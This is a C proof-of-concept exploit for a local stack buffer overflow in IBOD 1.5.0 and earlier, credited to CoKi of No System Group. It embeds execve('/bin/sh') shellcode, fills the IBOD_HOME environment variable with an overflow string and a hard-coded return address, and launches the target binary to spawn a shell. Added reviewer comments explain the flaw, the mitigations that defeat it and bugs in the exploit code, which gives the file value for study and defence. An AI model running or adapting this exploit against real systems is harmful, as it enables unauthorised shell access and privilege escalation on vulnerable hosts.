/* ibod_bof.c
 *
 * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
 *
 * Tested on Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <strings.h>

#define BUFFER 540 + 4

char shellcode[]=
	"\x31\xc0"                         /* xor %eax,%eax    */
	"\x31\xd2"                         /* xor %edx,%edx    */
	"\x52"                             /* push %edx        */
	"\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */
	"\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */
	"\x89\xe3"                         /* movl %esp,%ebx   */
	"\x52"                             /* push %edx        */
	"\x53"                             /* push %ebx        */
	"\x89\xe1"                         /* movl %esp,%ecx   */
	"\xb0\x0b"                         /* mov $0xb,%al     */
	"\xcd\x80";                        /* int $0x80        */

void use(char *program);

/*
 * Proof-of-concept driver: builds an oversized IBOD_HOME value, exports it
 * together with SHELLCODE, and then executes the binary named by argv[1]
 * with that environment.
 *
 * argv[1] is the path of the program to run (per the file header, an
 * ibod <= 1.5.0 binary). A wrong argument count or an unopenable path ends
 * the process with status 1; on success execl() replaces the process.
 *
 * Reviewer notes (defensive reading):
 *  - The flaw being demonstrated is presumably an unbounded copy of the
 *    IBOD_HOME value into a fixed-size stack buffer inside ibod; that code
 *    is not part of this file, so confirm against the ibod source.
 *  - The fix on the ibod side is to length-check environment values before
 *    copying them. Independently, a non-executable stack, stack-smashing
 *    protection and address-space randomization each break an assumption
 *    this PoC relies on (hard-coded address, payload in the environment).
 *  - strlen, memset, strncat, setenv, exit and execl are used without the
 *    headers that declare them; only <stdio.h> and <strings.h> are included.
 */
int main(int argc, char *argv[]) {

	FILE *file;
	char buf[BUFFER], *path, tmp[BUFFER];
	char *buffer=buf;	/* alias of buf, used only by the memset below */
	int ret;

	/* use() calls exit(1), so execution continues only with exactly one argument. */
	if(argc != 2) use(argv[0]);
	
	path = argv[1];

	/*
	 * Existence/readability check only: the stream is never read from and
	 * never closed.
	 */
	if((file = fopen(path, "r")) == NULL) {
		printf(" Failed to open file!\n");
		exit(1);
	}

	/*
	 * Address guess: a hard-coded constant just below 0xc0000000, reduced by
	 * the payload length and the path length. Because it is a constant, the
	 * PoC assumes a fixed stack layout for the target process; with stack
	 * randomization the value no longer matches. The unsigned result is
	 * narrowed into a signed int on assignment.
	 */
	ret = 0xbffffffa - strlen(shellcode) - strlen(path);
	
	/* buf becomes 540 'A' bytes followed by 4 zero bytes. */
	bzero(buf, sizeof(buf));
	memset(buffer, 'A', BUFFER-4);

	/*
	 * The raw bytes of ret are read as if they were a C string: the copy
	 * stops at the first zero byte and would run past ret if none of its
	 * four bytes were zero. strncat then appends at most 4 of those bytes.
	 * NOTE(review): 540 + 4 + the terminating NUL is 545 bytes, one more
	 * than buf holds, so strncat's terminator can land one byte past buf.
	 */
	sprintf(tmp, "%s", &ret);
	strncat(buf, tmp, 4);

	printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	/* Third argument 1: replace any existing value of these variables. */
	setenv("IBOD_HOME", buf, 1);
	setenv("SHELLCODE", shellcode, 1);

	/*
	 * Runs the target with the environment prepared above. The return value
	 * is not checked; if execl fails, control falls off the end of main.
	 */
	execl(path, path, NULL);

}

/*
 * Print the one-line usage message for this tool and terminate.
 *
 * program: name to show in the message (main passes argv[0]).
 * Does not return; the process exits with status 1.
 */
void use(char *program) {
	const char *self = program;

	fprintf(stdout, " Use: %s <path>\n", self);
	exit(1);
}

